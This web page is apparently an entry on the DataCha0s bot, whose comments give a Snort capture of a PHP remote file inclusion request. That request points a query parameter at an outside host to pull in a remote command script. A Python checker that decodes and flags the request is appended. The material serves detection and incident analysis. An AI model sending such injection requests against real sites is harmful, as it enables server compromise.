DataCha0s


URLs for more information:

2 Responses to “DataCha0s”

  1. Reg Quinton says:

    This robot seems to be doing PHP injection attacks as well. Snort packet capture:

    07/19-02:12:29.380290 200.215.129.70:44232 -> 129.97.128.84:80
    TCP TTL:47 TOS:0x0 ID:12084 IpLen:20 DgmLen:239 DF
    ***AP*** Seq: 0xF2D04426 Ack: 0x225106 Win: 0x16D0 TcpLen: 32
    TCP Options (3) => NOP NOP TS: 1411345356 2713027245
    47 45 54 20 2F 68 69 73 74 6F 72 79 2F 63 6F 6D GET /history/com
    70 6C 65 74 65 73 65 61 73 6F 6E 64 65 74 61 69 pleteseasondetai
    6C 73 2E 70 68 70 3F 53 65 61 73 6F 6E 3D 68 74 ls.php?Season=ht
    74 70 3A 2F 2F 77 77 77 2E 75 6E 6C 6F 63 6B 70 tp://www.unlockp
    6C 61 7A 61 2E 6E 6C 2F 6D 65 64 69 61 2F 63 6D laza.nl/media/cm
    64 3F 20 48 54 54 50 2F 31 2E 30 0D 0A 43 6F 6E d? HTTP/1.0..Con
    6E 65 63 74 69 6F 6E 3A 20 63 6C 6F 73 65 0D 0A nection: close..
    55 73 65 72 2D 41 67 65 6E 74 3A 20 44 61 74 61 User-Agent: Data
    43 68 61 30 73 2F 32 2E 30 0D 0A 48 6F 73 74 3A Cha0s/2.0..Host:
    20 77 77 77 2E 77 61 72 72 69 6F 72 6D 65 6E 73 www.warriormens
    62 61 73 6B 65 74 62 61 6C 6C 2E 75 77 61 74 65 basketball.uwate
    72 6C 6F 6F 2E 63 61 0D 0A 0D 0A rloo.ca....

    The content they’re trying to eject is clearly malicious:

    Angels of Death > #AoD > irc.gigachat.net > CMD > File List

  2. Reg Quinton says:

    DataCha0s seems to be a small group of Brazilian hackers. Their brag page is here:

    http://www.invasao.com.br/grupo04.htm

    I’m seeing lots of different attacks. I assume some common code they’re sharing.
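
A defender-side check for the request in the first comment's capture, as an added example that is not part of the original post or its comments: it rebuilds the payload from the Snort hex column, then flags a query parameter whose value is a URL and the DataCha0s User-Agent. The function names, finding labels and scheme list are assumptions made for this illustration.

```python
import re
from itertools import takewhile
from urllib.parse import parse_qsl, urlsplit

# Payload rows copied from the Snort capture in the first comment.
CAPTURE = """\
47 45 54 20 2F 68 69 73 74 6F 72 79 2F 63 6F 6D GET /history/com
70 6C 65 74 65 73 65 61 73 6F 6E 64 65 74 61 69 pleteseasondetai
6C 73 2E 70 68 70 3F 53 65 61 73 6F 6E 3D 68 74 ls.php?Season=ht
74 70 3A 2F 2F 77 77 77 2E 75 6E 6C 6F 63 6B 70 tp://www.unlockp
6C 61 7A 61 2E 6E 6C 2F 6D 65 64 69 61 2F 63 6D laza.nl/media/cm
64 3F 20 48 54 54 50 2F 31 2E 30 0D 0A 43 6F 6E d? HTTP/1.0..Con
6E 65 63 74 69 6F 6E 3A 20 63 6C 6F 73 65 0D 0A nection: close..
55 73 65 72 2D 41 67 65 6E 74 3A 20 44 61 74 61 User-Agent: Data
43 68 61 30 73 2F 32 2E 30 0D 0A 48 6F 73 74 3A Cha0s/2.0..Host:
20 77 77 77 2E 77 61 72 72 69 6F 72 6D 65 6E 73 www.warriormens
62 61 73 6B 65 74 62 61 6C 6C 2E 75 77 61 74 65 basketball.uwate
72 6C 6F 6F 2E 63 61 0D 0A 0D 0A rloo.ca....
"""
HEX_BYTE = re.compile(r"[0-9A-Fa-f]{2}")
REMOTE_URL = re.compile(r"\s*(?:https?|ftp)://", re.I)  # assumed scheme list

def payload_bytes(dump):
    """Rebuild payload bytes from Snort's hex column (at most 16 per row)."""
    out = bytearray()
    for row in dump.splitlines():
        cells = takewhile(HEX_BYTE.fullmatch, row.split()[:16])
        out += bytes(int(c, 16) for c in cells)
    return bytes(out)

def inspect_request(raw):
    """Flag URL-valued query parameters and the DataCha0s User-Agent."""
    head = raw.split(b"\r\n\r\n", 1)[0].decode("latin-1")
    request_line, *header_lines = head.split("\r\n")
    parts = request_line.split(" ")
    target = parts[1] if len(parts) > 1 else ""
    findings = []
    for name, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        if REMOTE_URL.match(value):  # a URL where the page expects a plain value
            findings.append(("remote-url-parameter", name, value))
    for line in header_lines:
        key, _, val = line.partition(":")
        if key.strip().lower() == "user-agent" and "datacha0s" in val.lower():
            findings.append(("scanner-user-agent", "User-Agent", val.strip()))
    return findings

if __name__ == "__main__":
    for finding in inspect_request(payload_bytes(CAPTURE)):
        print(finding)
```

The rebuilt payload is 187 bytes, which agrees with the capture's DgmLen:239 less IpLen:20 and TcpLen:32.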